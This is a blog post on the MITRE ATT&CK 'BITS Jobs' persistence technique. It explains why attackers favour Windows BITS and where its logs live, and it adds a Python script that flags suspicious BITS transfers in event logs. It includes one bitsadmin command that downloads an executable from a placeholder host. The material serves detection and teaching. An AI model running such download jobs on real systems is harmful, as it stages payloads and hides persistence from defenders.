MITRE ATT&CK (Persistence): BITS Jobs

goay xuan hui
Mar 4, 2021

What is BITS?

Background Intelligent Transfer Service (BITS) is a technology developed by Microsoft to manage file uploads and downloads, to and from HTTP servers and SMB shares.

Benefits of BITS

  • BITS tasks are self-contained in the BITS job database, without new files or registry modification.
  • Long-standing jobs are supported: the default maximum lifetime is 90 days and can be extended.
  • BITS tasks are often permitted by host firewalls.
  • BITS tasks can also resume a transfer after a network outage or reboot.

How to run BITS jobs?

cmd.exe /c bitsadmin /transfer JOBNAME /download /priority high http://downloadwebsite/file.exe c:\downloadfile.exe

When bitsadmin.exe is spawned, it creates the transfer job, hands it over to svchost.exe and then exits. svchost.exe is the process that hosts Windows services, including the network services group. So you will see the process below running:

c:\windows\system32\svchost.exe -k netsvcs -p -s bits

How to detect BITS jobs?

The properties above make BITS a useful tool for adversaries to maintain persistence and execute malicious code. We can find BITS-specific artifacts in:

Microsoft Windows event log: “Microsoft-Windows-Bits-Client Operational.evtx”

Folder Location: “C:\Windows\System32\Winevt\Logs”
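One way to triage that log offline, as an added example (not code from the original post): it parses an XML export of the BITS-Client operational log, pairs event ID 3 (job created) with event ID 59 (transfer started), and flags transfers by destination host, scheme and file type. The sample events, the allowlist, the extension list and the `Data` field names are constructed assumptions.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".scr")  # assumed triage list

# Constructed sample shaped like the output of
#   wevtutil qe Microsoft-Windows-Bits-Client/Operational /f:xml /e:Events
# Field names (string, string2, name, url) are assumptions; check a real record.
SAMPLE = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>3</EventID><TimeCreated SystemTime="2021-03-04T01:00:00Z"/></System>
 <EventData><Data Name="string">JOBNAME</Data><Data Name="string2">LAB\user1</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>59</EventID><TimeCreated SystemTime="2021-03-04T01:00:01Z"/></System>
 <EventData><Data Name="name">JOBNAME</Data><Data Name="url">http://downloadwebsite/file.exe</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>59</EventID><TimeCreated SystemTime="2021-03-04T02:00:00Z"/></System>
 <EventData><Data Name="name">Updater</Data><Data Name="url">https://updates.example.com/pkg.cab</Data></EventData>
</Event>
</Events>"""

def suspicious_transfers(xml_text, allowed_hosts):
    """Flag event ID 59 (transfer started) records worth a closer look."""
    owners, findings = {}, []
    for ev in ET.fromstring(xml_text).iterfind("e:Event", NS):
        eid = int(ev.findtext("e:System/e:EventID", namespaces=NS))
        when = ev.find("e:System/e:TimeCreated", NS).get("SystemTime")
        data = {d.get("Name"): d.text or "" for d in ev.iterfind("e:EventData/e:Data", NS)}
        if eid == 3:  # job created: remember the owner (keyed by job name for brevity)
            owners[data.get("string")] = data.get("string2")
        elif eid == 59:
            url = urlsplit(data.get("url", ""))
            reasons = []
            if (url.hostname or "").lower() not in allowed_hosts:
                reasons.append("host not in allowlist")
            if url.scheme == "http":
                reasons.append("cleartext HTTP")
            if url.path.lower().endswith(EXEC_EXT):
                reasons.append("executable payload")
            if reasons:
                findings.append({"time": when, "job": data.get("name"),
                                 "owner": owners.get(data.get("name")),
                                 "url": url.geturl(), "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in suspicious_transfers(SAMPLE, {"updates.example.com"}):
        print(f)
```

Job names are not unique on a real host, so correlate on the job GUID where the record carries one.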

